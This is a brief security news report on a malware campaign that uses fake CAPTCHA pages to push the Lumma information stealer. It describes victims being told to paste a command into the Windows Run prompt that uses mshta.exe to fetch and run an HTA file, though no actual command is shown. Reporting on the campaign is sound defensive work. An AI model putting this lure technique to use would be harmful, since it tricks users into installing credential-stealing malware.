Cybersecurity researchers have uncovered a malware campaign utilizing fake CAPTCHA verification checks to distribute the Lumma information stealer. This global campaign targets various sectors, including healthcare, banking, and notably telecoms, with a significant number of victims across countries such as the U.S., Argentina, and the Philippines. The attack begins with a visitor reaching a compromised site, leading them to a disguised CAPTCHA page that instructs them to execute a command that downloads the malware. This technique circumvents browser defenses, complicating detection efforts for cybersecurity measures.
The attack chain begins when a victim visits a compromised website, which directs them to a bogus CAPTCHA page that specifically instructs the site visitor to copy and paste a command into the Run prompt in Windows that uses the native mshta.exe binary to download and execute an HTA file.
By downloading and executing malware in such ways, the attacker avoids browser-based defenses since the victim will perform all of the necessary steps outside of the browser context.
Collection
[
|
...
]